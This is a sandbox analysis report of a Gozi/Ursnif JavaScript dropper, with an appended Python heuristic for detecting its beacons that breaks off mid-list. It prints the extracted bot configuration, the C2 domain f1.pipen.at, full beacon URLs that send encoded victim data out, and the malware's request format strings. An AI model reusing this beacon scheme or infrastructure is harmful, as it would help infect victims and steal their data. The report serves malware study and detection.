
Analysis Report open_attach_p2y.js

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:221263
Start date:08.04.2020
Start time:18:21:22
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 7m 16s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:open_attach_p2y.js
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Run name:Without Instrumentation
Number of new started processes analysed:19
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:1
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.bank.troj.evad.winJS@19/19@4/1
EGA Information:
  • Successful, ratio: 66.7%
HDC Information:
  • Successful, ratio: 4.5% (good quality ratio 4.1%)
  • Quality average: 76.1%
  • Quality standard deviation: 30.1%
HCA Information:
  • Successful, ratio: 75%
  • Number of executed functions: 100
  • Number of non-executed functions: 260
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Start process as user (medium integrity level)
  • Found application associated with file extension: .js
Warnings:
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, taskhostw.exe, dllhost.exe, ielowutil.exe, WMIADAP.exe, conhost.exe, WmiPrvSE.exe
  • Excluded IPs from analysis (whitelisted): 72.247.224.69, 93.184.221.240, 2.17.173.106, 23.39.80.147, 152.199.19.161
  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ie9comview.vo.msecnd.net, wu.ec.azureedge.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, site-cdn.onenote.net.edgekey.net, wu.azureedge.net, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, e5684.g.akamaiedge.net, go.microsoft.com, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, go.microsoft.com.edgekey.net, hlb.apr-52dd2-0.edgecastdns.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, cs9.wpc.v0cdn.net
  • Execution Graph export aborted for target mshta.exe, PID 3912 because there are no executed functions
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtReadVirtualMemory calls found.

Detection

Strategy | Score | Range | Reporting | Whitelisted | Threat | Detection
Threshold | 100 | 0 - 100 | (graphic) | false | Gozi Ursnif | malicious

Confidence

Strategy | Score | Range | Further Analysis Required? | Confidence
Threshold | 5 | 0 - 5 | false | (graphic)


Classification Spiderchart

Analysis Advice

Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")
Sample monitors window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook
Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior
Some HTTP requests failed (404). It is likely the sample will exhibit less behavior



Mitre Att&ck Matrix

Numbers in parentheses are the report's signature-count badges, copied as they appear (several badges may be run together). Cells the report left empty are shown as -.

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts (1) | Windows Management Instrumentation (2) | Valid Accounts (1) | Valid Accounts (1) | Software Packing (3) | Credential Dumping | System Time Discovery (1) | Remote File Copy (3) | Email Collection (1) | Data Encrypted (1) | Remote File Copy (3) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Replication Through Removable Media | PowerShell (1) | Port Monitors | Access Token Manipulation (1) | Scripting (2) | Network Sniffing | Account Discovery (1) | Remote Services | Data from Removable Media | Exfiltration Over Other Network Medium | Standard Cryptographic Protocol (1) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
External Remote Services | Scripting (2) | Accessibility Features | Process Injection (513) | Obfuscated Files or Information (3) | Input Capture | Security Software Discovery (211) | Windows Remote Management | Data from Network Shared Drive | Automated Exfiltration | Standard Non-Application Layer Protocol (3) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Drive-by Compromise | Execution through API (1) | System Firmware | DLL Search Order Hijacking | Masquerading (11) | Credentials in Files | File and Directory Discovery (3) | Logon Scripts | Input Capture | Data Encrypted | Standard Application Layer Protocol (3) | SIM Card Swap | - | Premium SMS Toll Fraud
Exploit Public-Facing Application | Exploitation for Client Execution (1) | Shortcut Modification | File System Permissions Weakness | Valid Accounts (1) | Account Manipulation | System Information Discovery (45) | Shared Webroot | Data Staged | Scheduled Transfer | Connection Proxy (1) | Manipulate Device Communication | - | Manipulate App Store Rankings or Ratings
Spearphishing Link | Graphical User Interface (1) | Modify Existing Service | New Service | Virtualization/Sandbox Evasion (2) | Brute Force | Virtualization/Sandbox Evasion (2) | Third-party Software | Screen Capture | Data Transfer Size Limits | Commonly Used Port | Jamming or Denial of Service | - | Abuse Accessibility Features
Spearphishing Attachment | Command-Line Interface (12) | Path Interception | Scheduled Task | Access Token Manipulation (1) | Two-Factor Authentication Interception | Process Discovery (3) | Pass the Hash | Email Collection | Exfiltration Over Command and Control Channel | Uncommonly Used Port | Rogue Wi-Fi Access Points | - | Data Encrypted for Impact
Spearphishing via Service | Third-party Software | Logon Scripts | Process Injection | Process Injection (513) | Bash History | Application Window Discovery (1) | Remote Desktop Protocol | Clipboard Data | Exfiltration Over Alternative Protocol | Standard Application Layer Protocol | Downgrade to Insecure Protocols | - | Generate Fraudulent Advertising Revenue
Supply Chain Compromise | Rundll32 | DLL Search Order Hijacking | Service Registry Permissions Weakness | DLL Side-Loading (1) | Input Prompt | System Owner/User Discovery (1) | Windows Admin Shares | Automated Collection | Exfiltration Over Physical Medium | Multilayer Encryption | Rogue Cellular Base Station | - | Data Destruction
Trusted Relationship | PowerShell | Change Default File Association | Exploitation for Privilege Escalation | Connection Proxy (1) | Keychain | Process Discovery | Taint Shared Content | Audio Capture | Commonly Used Port | Connection Proxy | - | - | Data Encrypted for Impact

Signature Overview



AV Detection:

Found malware configuration
Source: regsvr32.exe.4888.5.memstr | Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250137", "uptime": "242", "system": "ecde5b0ce2df094efe45e0bf22cd4877hh", "size": "200777", "crc": "2", "action": "00000000", "id": "3000", "time": "1586395395", "user": "8a8ed6d154c8a3b79c4b2eb5a02b1ead", "hash": "0x43f98375", "soft": "3"}
Multi AV Scanner detection for domain / URL
Source: f1.pipen.at | Virustotal: Detection: 7%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\TsCrxrp.txt | Virustotal: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\TsCrxrp.txt | ReversingLabs: Detection: 54%
Multi AV Scanner detection for submitted file
Source: open_attach_p2y.js | Virustotal: Detection: 28%
Source: open_attach_p2y.js | ReversingLabs: Detection: 25%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\TsCrxrp.txt | Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 5.2.regsvr32.exe.400000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen8

Spreading:

Contains functionality to enumerate / list files inside a directory
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_0507CDF2 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_0508940E RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_05078181 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose
Contains functionality to query local drives
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_05087CDC wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree

Networking:

Creates a COM Internet Explorer object
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
Found Tor onion address
Source: regsvr32.exe, 00000005.00000003.923006439.00000000056B0000.00000004.00000001.sdmp | String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:74.0) Gecko/20100101 Firefox/74.0http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: regsvr32.exe, 00000005.00000002.968635688.0000000005070000.00000040.00000001.sdmp | String found in binary or memory: wADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:74.0) Gecko/20100101 Firefox/74.0http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: control.exe, 00000012.00000003.937070436.000002A0B34C0000.00000004.00000001.sdmp | String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:74.0) Gecko/20100101 Firefox/74.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Internet Provider seen in connection with other malware
Source: Joe Sandbox View | ASN Name: unknown unknown
Downloads files from webservers via HTTP
Source: global traffic | HTTP traffic detected: GET /api1/SfejCnwg/ObplLX6lgqMk8x5IYWyrQjz/Y2O4fs9mMk/g5eoex0bDl2DvVF1v/M6uzzMMscZde/GqXc2_2Fkiz/zIy5mXztZodBE_/2BxIFhanp_2B_2FgecwGc/qXbCjchMnq9d_2By/xSFy96cXsi_2Bvr/jZWSdrxEZ_2FqHfmDa/9HxiAkDke/iIPkW0ZGIi5a33pJqTQH/aG7V2XSvT4EaW83Zj4J/tBE_2F6g93SgF3rtATdt5C/BL39vJst0BmSb/_2FBNEbv/okmko2ExQMasUC_0A_0DgT_/2BfvRPq9FB/V8RUUgp9vepqYVcH3/KNlus3r_2FFs/hrai0uc9_2F/EMRkNVI3sBXy7Y/WDCf_2Fx/k HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: f1.pipen.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /favicon.ico HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: f1.pipen.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /api1/zf1YyM2D0qq/dv4HwKjvoGPS84/1qhH0K2Xek6YAh6tR0XIZ/pt0xfW_2FFptMyf2/ZDsbpSWyWxuLMgH/IBjLU1JBy0ys9i47vh/XmWMKbee4/6utCB3SHvGD3dRCl6sYn/J8QKxa9bhRYimjIIdrp/kkTm5Bz0hbdye_2BJwZ_2F/oZ6uMwPcYtz3Q/FoX03Kzm/jsy5Ty7DBaSG6MrU3vzWADc/9UJzFpne21/4zPh7s5qA6tPioCev/hWASaIklH0Tr/fMOezL9gwN_/0A_0DtLNCKqGgL/FdN2o0U0x2Tlot6a_2B0C/R_2FekczxIvK_2FZ/5bj5tYMNOYqD02F/k3itIA5kMRr2/y HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: f1.pipen.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /favicon.ico HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: f1.pipen.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /api1/6_2FDqSOD/Nk1aDFtDzHFZEtdiGRH1/QXQBDQuGv8v8VDMhp2g/pBdt89kIiYQRHDo0EPzHC2/8blZ6Yv3GjwVY/JdLmBNGZ/1F_2FnBXN3pWZ769LwlJ0h6/FYzf5_2FJ_/2B9zcaBBY_2FLlTrJ/6Ik6vh3a07Fs/e66v5UzvBUU/YM_2FNpy_2FO8O/8fHd5dLpW7b5T3w_2FHGz/TB0wHf0r74ASXqdk/6Qv_2F1BCk0UWrC/jL_2BjDr37HaZYTT4C/0t0fW_2FF/Ql3e_2BsjcQKPuyNjli_/0A_0DOnCHUgIBBaHF_2/BHKaMuJ7glp5Ijo6QnQeNb/acEhs1lCg1RH7/R_2BMA_2/BJAOnfc9Rm5Gu/HjD_2F HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: f1.pipen.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /favicon.ico HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: f1.pipen.at | Connection: Keep-Alive
Found strings which match to known social media urls
Source: msapplication.xml1.8.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x8286610c,0x01d60e0d</date><accdate>0x8286610c,0x01d60e0d</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml1.8.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x8286610c,0x01d60e0d</date><accdate>0x8288bb4c,0x01d60e0d</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml6.8.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x82906903,0x01d60e0d</date><accdate>0x82906903,0x01d60e0d</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml6.8.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x82906903,0x01d60e0d</date><accdate>0x8292ca9e,0x01d60e0d</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml8.8.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x82953fe4,0x01d60e0d</date><accdate>0x82953fe4,0x01d60e0d</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml8.8.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x82953fe4,0x01d60e0d</date><accdate>0x8297a683,0x01d60e0d</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: f1.pipen.at
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Wed, 08 Apr 2020 16:23:14 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Content-Encoding: gzip | Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a | Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Urls found in memory or binary data
Source: regsvr32.exe, control.exe, 00000012.00000003.937070436.000002A0B34C0000.00000004.00000001.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txt
Source: regsvr32.exe, 00000005.00000003.923006439.00000000056B0000.00000004.00000001.sdmp, control.exe, 00000012.00000003.937070436.000002A0B34C0000.00000004.00000001.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: regsvr32.exe, 00000004.00000002.960076221.0000000001530000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.964562442.0000000003030000.00000002.00000001.sdmp, explorer.exe, 00000013.00000000.954891311.0000000000BB0000.00000002.00000001.sdmp | String found in binary or memory: http://f1.pipen.at/api1/6_2FDqSOD/Nk1aDFtDzHFZEtdiGRH1/QXQBDQuGv8v8VDMhp2g/pBdt89kIiYQRHDo0EPzH
Source: explorer.exe, 00000013.00000002.1073032575.0000000009C8E000.00000004.00000001.sdmp | String found in binary or memory: http://f1.pipen.at/api1/SfejCnwg/ObplLX6lgqMk8x5IYWyrQjz/Y2O4fs9mMk/g5eoex0bDl2DvVF1v/M6uzzMMscZde/G
Source: explorer.exe, 00000013.00000000.1007588572.0000000009A4F000.00000004.00000001.sdmp | String found in binary or memory: http://f1.pipen.at/api1/zf1YyM2D0qq/dv4HwKjvoGPS84/1qhH0K2Xek6YAh6tR0XIZ/pt0xfW_2FFptMyf2/ZDsbpSWyWx
Source: explorer.exe, 00000013.00000000.1013069103.000000000B276000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: regsvr32.exe, 00000005.00000003.923006439.00000000056B0000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.968635688.0000000005070000.00000040.00000001.sdmp, control.exe, 00000012.00000003.937070436.000002A0B34C0000.00000004.00000001.sdmp | String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 00000013.00000002.1043019207.0000000002630000.00000004.00000001.sdmp | String found in binary or memory: http://ns.adob1
Source: msapplication.xml.8.dr | String found in binary or memory: http://www.amazon.com/
Source: explorer.exe, 00000013.00000000.1013069103.000000000B276000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000013.00000000.1013069103.000000000B276000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000013.00000000.1013069103.000000000B276000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000013.00000000.1013069103.000000000B276000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000013.00000000.1013069103.000000000B276000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000013.00000000.1013069103.000000000B276000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000013.00000000.1013069103.000000000B276000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: msapplication.xml2.8.dr | String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000013.00000000.1013069103.000000000B276000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: msapplication.xml3.8.dr | String found in binary or memory: http://www.live.com/
Source: msapplication.xml4.8.dr | String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml5.8.dr | String found in binary or memory: http://www.reddit.com/
Source: explorer.exe, 00000013.00000000.1013069103.000000000B276000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000013.00000000.1013069103.000000000B276000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000013.00000000.1013069103.000000000B276000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000013.00000000.1013069103.000000000B276000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: msapplication.xml6.8.dr | String found in binary or memory: http://www.twitter.com/
Source: explorer.exe, 00000013.00000000.1013069103.000000000B276000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: msapplication.xml7.8.dr | String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml8.8.dr | String found in binary or memory: http://www.youtube.com/
Source: explorer.exe, 00000013.00000000.1013069103.000000000B276000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
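The three GET requests to f1.pipen.at above share the ISFB/Ursnif beacon layout: the bot's encrypted registration data is base64-encoded, the base64 characters '/' and '+' (and the line-break bytes 0x0A/0x0D) are rewritten as _2F, _2B, _0A and _0D, and the result is sliced into pseudo-random path segments under a fixed directory (/api1/ here), each request followed by a /favicon.ico fetch from the same Internet Explorer user agent. The following is an added example, not part of the Joe Sandbox report: a proxy-log heuristic that flags such requests and reassembles the base64 blob, plus a helper that fills the first format string recovered from memory in the "Found Tor onion address" signature (soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x) with the configuration the extractor pulled from regsvr32.exe in the AV Detection section. The three /api1/ paths and the favicon request are copied from this report; the two benign request lines are constructed, and reading the extractor's "crc" field as hex (to match the %x directive) is an assumption.

```python
"""ISFB/Ursnif beacon heuristics built from the traffic and extracted config in
this report.  Added example for illustration; not Joe Sandbox code."""
import base64
import re
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# The bot escapes '/' , '+' and line-break bytes of its base64 blob as "_XX"
# (uppercase hex) and splits the blob into path segments under one directory.
HEX_ESCAPE = re.compile(r"_([0-9A-F]{2})")
B64_TEXT = re.compile(r"^[A-Za-z0-9+/]+=*$")
SEGMENT_TOKEN = re.compile(r"^[A-Za-z0-9_]+$")
SUSPICIOUS_AT = 4  # minimum score for a request to be flagged


@dataclass
class Verdict:
    target: str
    score: int = 0
    reasons: list = field(default_factory=list)
    blob: str = ""        # reassembled base64 text, only filled when flagged
    decoded_len: int = 0  # bytes recovered from the blob, 0 if it did not decode

    @property
    def suspicious(self) -> bool:
        return self.score >= SUSPICIOUS_AT


def reassemble_blob(path: str) -> str:
    """Drop the leading directory, join the remaining segments, undo the _XX
    escapes and strip the CR/LF bytes they encoded."""
    segments = [s for s in path.split("/") if s]
    joined = "".join(segments[1:])
    text = HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), joined)
    return text.replace("\r", "").replace("\n", "")


def score_request(method: str, target: str) -> Verdict:
    """Score one request line the way a proxy-log rule would."""
    v = Verdict(target)
    path = urlsplit(target).path
    segments = [s for s in path.split("/") if s]

    if method == "GET" and len(segments) >= 8:
        v.score += 1
        v.reasons.append(f"{len(segments)} path segments")
    escapes = len(re.findall(r"_2[FB]", path))
    if escapes >= 2:
        v.score += 2
        v.reasons.append(f"{escapes} _2F/_2B escapes")
    if len(path) > 200:
        v.score += 1
        v.reasons.append(f"path length {len(path)}")
    if segments and all(SEGMENT_TOKEN.match(s) for s in segments):
        v.score += 1
        v.reasons.append("segments are bare base64-style tokens")

    if v.suspicious:
        v.blob = reassemble_blob(path)
        if B64_TEXT.match(v.blob):
            core = v.blob.rstrip("=")
            try:
                v.decoded_len = len(base64.b64decode(core + "=" * (-len(core) % 4), validate=True))
            except ValueError:  # binascii.Error is a ValueError subclass
                v.decoded_len = 0
    return v


def scan(requests):
    """Return the Verdict for every (method, target) pair that crosses the threshold."""
    return [v for v in (score_request(m, t) for m, t in requests) if v.suspicious]


# Constructed log: three /api1/ paths and the favicon fetch copied from this
# report, followed by two made-up benign requests.
SAMPLE_REQUESTS = [
    ("GET", "/api1/SfejCnwg/ObplLX6lgqMk8x5IYWyrQjz/Y2O4fs9mMk/g5eoex0bDl2DvVF1v/M6uzzMMscZde/GqXc2_2Fkiz/zIy5mXztZodBE_/2BxIFhanp_2B_2FgecwGc/qXbCjchMnq9d_2By/xSFy96cXsi_2Bvr/jZWSdrxEZ_2FqHfmDa/9HxiAkDke/iIPkW0ZGIi5a33pJqTQH/aG7V2XSvT4EaW83Zj4J/tBE_2F6g93SgF3rtATdt5C/BL39vJst0BmSb/_2FBNEbv/okmko2ExQMasUC_0A_0DgT_/2BfvRPq9FB/V8RUUgp9vepqYVcH3/KNlus3r_2FFs/hrai0uc9_2F/EMRkNVI3sBXy7Y/WDCf_2Fx/k"),
    ("GET", "/favicon.ico"),
    ("GET", "/api1/zf1YyM2D0qq/dv4HwKjvoGPS84/1qhH0K2Xek6YAh6tR0XIZ/pt0xfW_2FFptMyf2/ZDsbpSWyWxuLMgH/IBjLU1JBy0ys9i47vh/XmWMKbee4/6utCB3SHvGD3dRCl6sYn/J8QKxa9bhRYimjIIdrp/kkTm5Bz0hbdye_2BJwZ_2F/oZ6uMwPcYtz3Q/FoX03Kzm/jsy5Ty7DBaSG6MrU3vzWADc/9UJzFpne21/4zPh7s5qA6tPioCev/hWASaIklH0Tr/fMOezL9gwN_/0A_0DtLNCKqGgL/FdN2o0U0x2Tlot6a_2B0C/R_2FekczxIvK_2FZ/5bj5tYMNOYqD02F/k3itIA5kMRr2/y"),
    ("GET", "/api1/6_2FDqSOD/Nk1aDFtDzHFZEtdiGRH1/QXQBDQuGv8v8VDMhp2g/pBdt89kIiYQRHDo0EPzHC2/8blZ6Yv3GjwVY/JdLmBNGZ/1F_2FnBXN3pWZ769LwlJ0h6/FYzf5_2FJ_/2B9zcaBBY_2FLlTrJ/6Ik6vh3a07Fs/e66v5UzvBUU/YM_2FNpy_2FO8O/8fHd5dLpW7b5T3w_2FHGz/TB0wHf0r74ASXqdk/6Qv_2F1BCk0UWrC/jL_2BjDr37HaZYTT4C/0t0fW_2FF/Ql3e_2BsjcQKPuyNjli_/0A_0DOnCHUgIBBaHF_2/BHKaMuJ7glp5Ijo6QnQeNb/acEhs1lCg1RH7/R_2BMA_2/BJAOnfc9Rm5Gu/HjD_2F"),
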